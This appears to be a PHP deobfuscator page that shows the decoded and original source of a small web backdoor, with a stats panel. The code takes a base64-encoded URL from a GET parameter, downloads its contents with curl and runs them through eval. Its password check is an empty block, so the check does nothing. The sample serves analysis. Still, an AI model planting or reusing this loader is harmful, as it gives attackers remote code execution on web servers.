Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $strNX=base64_decode; $c_init='curl_init'; $c_setopt='curl_setopt'; $c_exec='cur..

Decoded Output download

<?php 
$strNX=base64_decode; 
$c_init='curl_init'; 
$c_setopt='curl_setopt'; 
$c_exec='curl_exec'; 
	if(isset($_GET['u']) && isset($_GET['pw'])){ 
		if(strtoupper(md5($_GET['pw']))!='C613EDAC9ACFC7A8AFD03B7B99364095'){ 
	} 
	$ch=$c_init($strNX($_GET['u'])); 
	$c_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
	$r=$c_exec($ch); 
	eval(''.$r); 
	die; 
} ?>

Did this file decode correctly?

Original Code

<?php
$strNX=base64_decode;
$c_init='curl_init';
$c_setopt='curl_setopt';
$c_exec='curl_exec';
	if(isset($_GET['u']) && isset($_GET['pw'])){
		if(strtoupper(md5($_GET['pw']))!='C613EDAC9ACFC7A8AFD03B7B99364095'){
	}
	$ch=$c_init($strNX($_GET['u']));
	$c_setopt($ch,CURLOPT_RETURNTRANSFER,1);
	$r=$c_exec($ch);
	eval(''.$r);
	die;
}

Function Calls

None

Variables

None

Stats

MD5 8b4b894353ea5bb9d547395a82d6837c
Eval Count 0
Decode Time 48 ms